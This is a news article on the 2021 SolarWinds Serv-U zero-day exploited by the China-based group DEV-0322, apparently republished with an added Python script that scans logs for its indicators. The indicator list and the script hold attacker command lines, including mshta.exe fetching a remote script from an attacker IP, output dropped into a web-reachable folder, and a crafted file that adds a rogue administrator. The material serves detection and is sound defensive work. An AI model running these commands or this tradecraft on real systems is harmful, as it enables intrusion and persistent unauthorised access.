SolarWinds 0-day gave Chinese hackers privileged access to customer servers | GeekComparison

Microsoft said Tuesday that China-based hackers with a history of attacking software companies and the US defense industry exploited a zero-day vulnerability in a SolarWinds product.

SolarWinds announced the zero-day on Monday after receiving a notification from Microsoft that it had discovered that a previously unknown vulnerability in the SolarWinds Serv-U product line was being actively exploited. Austin, Texas-based SolarWinds did not provide details about the threat actor behind the attacks or how their attack worked.

Commercial VPNs and compromised consumer routers

On Tuesday, Microsoft said it is referring to the hacking group as “DEV-0322” for now. “DEV” denotes a “development group,” a temporary designation used before Microsoft researchers have much confidence in the origin or identity of the actor behind an operation. The company said the attackers are physically located in China and often rely on botnets made up of routers or other types of IoT devices.

“MSTIC has observed DEV-0322 targeting entities in the US defense industrial base sector and software companies,” researchers from the Microsoft Threat Intelligence Center wrote in a post. “This activity group is based in China and has been observed using commercial VPN solutions and compromised consumer routers in their attacker infrastructure.”

Microsoft did not say whether DEV-0322 was aimed at software companies, defense contractors or other types of targets in the attacks it discovered.

In addition to the three attacker-affiliated servers already disclosed by SolarWinds, Microsoft has provided three additional indicators that people can use to determine if they have been hacked. The indicators of compromise are:

  • 98[.]176[.]196[.]89
  • 68[.]235[.]178[.]32
  • 208[.]113[.]35[.]58
  • 144[.]34[.]179[.]162
  • 97[.]77[.]97[.]58
  • hxxp://144[.]34[.]179[.]162/a
  • C:\Windows\Temp\Serv-U.bat
  • C:\Windows\Temp\test\current.dmp
  • The presence of suspicious exception errors, particularly in the DebugSocketlog.txt log file
  • C:\Windows\System32\mshta.exe http://144[.]34[.]179[.]162/a (defanged)
  • cmd.exe /c whoami > "./Client/Common/redacted.txt"
  • cmd.exe /c dir > ".\Client\Common\redacted.txt"
  • cmd.exe /c “C:\Windows\Temp\Serv-U.bat”
  • powershell.exe C:\Windows\Temp\Serv-U.bat
  • cmd.exe /c type \\redacted\redacted.Archive > “C:\ProgramData\RhinoSoft\Serv-U\Users\Global Users\redacted.Archive”

Tuesday’s post also included new technical details about the attack. Specifically:

We observed that DEV-0322 redirected the output of their cmd.exe commands to files in the Serv-U \Client\Common\ directory, which is accessible over the Internet by default, so that the attackers could retrieve the results of the commands. The actor also appeared to add a new global user to Serv-U, effectively adding themselves as a Serv-U administrator, by manually creating a crafted .Archive file in the Global Users directory. Serv-U user information is stored in these .Archive files.

Due to the way DEV-0322 had written their code, when the exploit successfully compromises the Serv-U process, an exception is thrown and logged in a Serv-U log file, DebugSocketLog.txt. The process may also crash after a malicious command is executed.

By reviewing telemetry, we identified features of the exploit, but no root-cause vulnerability. MSTIC worked with the Microsoft Offensive Security Research team, who performed vulnerability research on the Serv-U binary and identified the vulnerability through black box analysis. After a root cause was found, we reported the vulnerability to SolarWinds, who responded quickly to understand the issue and build a patch.
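The indicator list above and Microsoft's description of the actor's tradecraft (command output dropped into \Client\Common\, a crafted .Archive file in Global Users, an exception in DebugSocketLog.txt, mshta.exe fetching a remote script) translate directly into a triage check. The script below is an added example written for this page; it is not code from Microsoft, SolarWinds, or the original article. It assumes the collected evidence is handed in as plain lists of strings (lines from DebugSocketLog.txt, process command lines from endpoint telemetry, network log lines, and file paths found on the host), and all sample data in it is constructed. It re-fangs the published IoCs only so they match real log text; nothing here touches the network or filesystem.

```python
"""Added example: offline triage of a Serv-U host against the DEV-0322 /
CVE-2021-35211 indicators published by SolarWinds and Microsoft.
Inputs are plain lists of strings supplied by the caller (assumption)."""
import re

# Defanged IoCs exactly as published; brackets keep them non-clickable.
DEFANGED_IPS = [
    "98[.]176[.]196[.]89",
    "68[.]235[.]178[.]32",
    "208[.]113[.]35[.]58",
    "144[.]34[.]179[.]162",
    "97[.]77[.]97[.]58",
]
# File artefacts named in the advisory (compared case-insensitively).
IOC_FILE_PATHS = {
    r"c:\windows\temp\serv-u.bat",
    r"c:\windows\temp\test\current.dmp",
}

def refang(ioc: str) -> str:
    """Turn '1[.]2[.]3[.]4' / 'hxxp://' into the form seen in real logs."""
    return ioc.replace("[.]", ".").replace("hxxp://", "http://")

IOC_IPS = {refang(ip) for ip in DEFANGED_IPS}
_IP_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")

def find_ioc_ips(lines):
    """Return (line_no, ip) for each occurrence of a listed attacker IP."""
    hits = []
    for no, line in enumerate(lines, 1):
        for ip in _IP_RE.findall(line):
            if ip in IOC_IPS:
                hits.append((no, ip))
    return hits

# Behavioural patterns derived from the advisory's command-line IoCs.
COMMAND_PATTERNS = {
    # mshta.exe pulling a remote script (the advisory's hxxp://.../a)
    "mshta_remote_script": re.compile(r"mshta\.exe\s+https?://", re.I),
    # command output redirected into the Internet-reachable Client\Common dir
    "output_to_client_common": re.compile(
        r">\s*\"?\.?[\\/]Client[\\/]Common[\\/]", re.I),
    # the dropped batch file being run via cmd.exe or powershell.exe
    "serv-u_bat_execution": re.compile(
        r"(cmd\.exe|powershell\.exe).*\\Temp\\Serv-U\.bat", re.I),
    # a crafted .Archive file written into the Global Users directory
    "crafted_archive_written": re.compile(
        r"type\s+.*>\s*\"?.*\\Global Users\\.*\.Archive", re.I),
}

def find_suspicious_commands(command_lines):
    """Return (line_no, pattern_name) for every matching command line."""
    hits = []
    for no, cmd in enumerate(command_lines, 1):
        for name, pat in COMMAND_PATTERNS.items():
            if pat.search(cmd):
                hits.append((no, name))
    return hits

def find_exception_errors(debug_log_lines):
    """Serv-U logs an exception in DebugSocketLog.txt when the exploit lands."""
    return [no for no, line in enumerate(debug_log_lines, 1)
            if "exception" in line.lower()]

def find_ioc_files(paths):
    """Return the supplied paths that match a published file artefact."""
    return sorted(p for p in paths if p.lower() in IOC_FILE_PATHS)

def triage(debug_log, commands, files, network_lines=()):
    """Run every check and return the findings grouped by indicator type."""
    return {
        "ioc_ips": find_ioc_ips(list(network_lines) + list(commands)),
        "suspicious_commands": find_suspicious_commands(commands),
        "exception_lines": find_exception_errors(debug_log),
        "ioc_files": find_ioc_files(files),
    }

# Constructed sample evidence (not real Serv-U or telemetry output).
SAMPLE_DEBUG_LOG = [
    "2021-07-12 03:14:05 Socket 7 connection from 10.0.0.5:51822",
    "2021-07-12 03:14:07 EXCEPTION: unhandled exception in SSH session handler",
    "2021-07-12 03:14:08 Socket 7 closed",
]
SAMPLE_COMMANDS = [
    r"C:\Windows\System32\mshta.exe http://144.34.179.162/a",
    r'cmd.exe /c whoami > "./Client/Common/redacted.txt"',
    r"powershell.exe C:\Windows\Temp\Serv-U.bat",
    r'cmd.exe /c type \\redacted\redacted.Archive > "C:\ProgramData\RhinoSoft\Serv-U\Users\Global Users\redacted.Archive"',
    r"C:\Windows\System32\svchost.exe -k netsvcs",
]
SAMPLE_FILES = [
    r"C:\Windows\Temp\Serv-U.bat",
    r"C:\Windows\Temp\test\current.dmp",
    r"C:\Windows\Temp\benign.log",
]

if __name__ == "__main__":
    for kind, hits in triage(SAMPLE_DEBUG_LOG, SAMPLE_COMMANDS, SAMPLE_FILES).items():
        print(f"{kind}: {hits}")
```

The behavioural patterns matter more than the IP list: the addresses are cheap for an actor to rotate, whereas output redirected into \Client\Common\, a hand-written .Archive file under Global Users, and an exception in DebugSocketLog.txt follow from how the exploit and post-exploitation worked. Treat any hit in `suspicious_commands` or `exception_lines` as grounds to pull the host for full forensic review rather than as noise.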

The zero-day vulnerability, tracked as CVE-2021-35211, resides in SolarWinds’ Serv-U product, which customers use to transfer files over networks. When Serv-U’s SSH service is exposed to the Internet, exploiting the flaw allows attackers to remotely execute malicious code with high system privileges. From there, attackers can install and execute malicious payloads, or they can view and modify data.

SolarWinds became an overnight household name in late December when investigators discovered it was at the center of a supply chain attack with global reach. After compromising SolarWinds’ software build system, the attackers used their access to push a malicious update to about 18,000 customers of the company’s Orion network management tool.

Of those 18,000 customers, about nine of them in US government agencies and about 100 of them in the private sector received follow-up malware. The federal government has attributed the attacks to the Russian Foreign Intelligence Service, abbreviated SVR. For more than a decade, the SVR has been running malware campaigns targeting governments, political think tanks, and other organizations around the world.

The zero-day attacks that Microsoft discovered and reported are unrelated to the Orion supply chain attack.

SolarWinds patched the vulnerability over the weekend. Anyone using a vulnerable version of Serv-U should update immediately and check for signs of compromise.
